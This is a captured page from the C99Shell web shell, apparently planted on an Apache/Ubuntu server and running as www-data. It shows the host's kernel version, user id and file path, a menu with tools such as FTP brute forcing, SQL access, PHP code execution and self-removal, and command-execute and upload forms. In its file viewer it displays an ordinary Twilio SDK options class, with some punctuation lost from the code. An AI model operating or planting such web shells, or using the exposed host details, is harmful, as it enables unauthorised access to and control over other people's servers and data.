!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Conversations/V1/   drwxr-xr-x
Free 13.19 GB of 57.97 GB (22.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ConfigurationOptions.php (5.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Conversations\V1;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
ConfigurationOptions {
    
/**
     * @param string $defaultChatServiceSid The SID of the default Conversation
     *                                      Service that every new conversation
     *                                      will be associated with.
     * @param string $defaultMessagingServiceSid The SID of the default Messaging
     *                                           Service that every new
     *                                           conversation will be associated
     *                                           with.
     * @param string $defaultInactiveTimer Default ISO8601 duration when
     *                                     conversation will be switched to
     *                                     `inactive` state.
     * @param string $defaultClosedTimer Default ISO8601 duration when conversation
     *                                   will be switched to `closed` state.
     * @return UpdateConfigurationOptions Options builder
     */
    
public static function update(string $defaultChatServiceSid Values::NONEstring $defaultMessagingServiceSid Values::NONEstring $defaultInactiveTimer Values::NONEstring $defaultClosedTimer Values::NONE): UpdateConfigurationOptions {
        return new 
UpdateConfigurationOptions($defaultChatServiceSid$defaultMessagingServiceSid$defaultInactiveTimer$defaultClosedTimer);
    }
}

class 
UpdateConfigurationOptions extends Options {
    
/**
     * @param string $defaultChatServiceSid The SID of the default Conversation
     *                                      Service that every new conversation
     *                                      will be associated with.
     * @param string $defaultMessagingServiceSid The SID of the default Messaging
     *                                           Service that every new
     *                                           conversation will be associated
     *                                           with.
     * @param string $defaultInactiveTimer Default ISO8601 duration when
     *                                     conversation will be switched to
     *                                     `inactive` state.
     * @param string $defaultClosedTimer Default ISO8601 duration when conversation
     *                                   will be switched to `closed` state.
     */
    
public function __construct(string $defaultChatServiceSid Values::NONEstring $defaultMessagingServiceSid Values::NONEstring $defaultInactiveTimer Values::NONEstring $defaultClosedTimer Values::NONE) {
        
$this->options['defaultChatServiceSid'] = $defaultChatServiceSid;
        
$this->options['defaultMessagingServiceSid'] = $defaultMessagingServiceSid;
        
$this->options['defaultInactiveTimer'] = $defaultInactiveTimer;
        
$this->options['defaultClosedTimer'] = $defaultClosedTimer;
    }

    
/**
     * The SID of the default [Conversation Service](https://www.twilio.com/docs/conversations/api/service-resource) to use when creating a conversation.
     *
     * @param string $defaultChatServiceSid The SID of the default Conversation
     *                                      Service that every new conversation
     *                                      will be associated with.
     * @return $this Fluent Builder
     */
    
public function setDefaultChatServiceSid(string $defaultChatServiceSid): self {
        
$this->options['defaultChatServiceSid'] = $defaultChatServiceSid;
        return 
$this;
    }

    
/**
     * The SID of the default [Messaging Service](https://www.twilio.com/docs/sms/services/api) to use when creating a conversation.
     *
     * @param string $defaultMessagingServiceSid The SID of the default Messaging
     *                                           Service that every new
     *                                           conversation will be associated
     *                                           with.
     * @return $this Fluent Builder
     */
    
public function setDefaultMessagingServiceSid(string $defaultMessagingServiceSid): self {
        
$this->options['defaultMessagingServiceSid'] = $defaultMessagingServiceSid;
        return 
$this;
    }

    
/**
     * Default ISO8601 duration when conversation will be switched to `inactive` state. Minimum value for this timer is 1 minute.
     *
     * @param string $defaultInactiveTimer Default ISO8601 duration when
     *                                     conversation will be switched to
     *                                     `inactive` state.
     * @return $this Fluent Builder
     */
    
public function setDefaultInactiveTimer(string $defaultInactiveTimer): self {
        
$this->options['defaultInactiveTimer'] = $defaultInactiveTimer;
        return 
$this;
    }

    
/**
     * Default ISO8601 duration when conversation will be switched to `closed` state. Minimum value for this timer is 10 minutes.
     *
     * @param string $defaultClosedTimer Default ISO8601 duration when conversation
     *                                   will be switched to `closed` state.
     * @return $this Fluent Builder
     */
    
public function setDefaultClosedTimer(string $defaultClosedTimer): self {
        
$this->options['defaultClosedTimer'] = $defaultClosedTimer;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Conversations.V1.UpdateConfigurationOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0066 ]--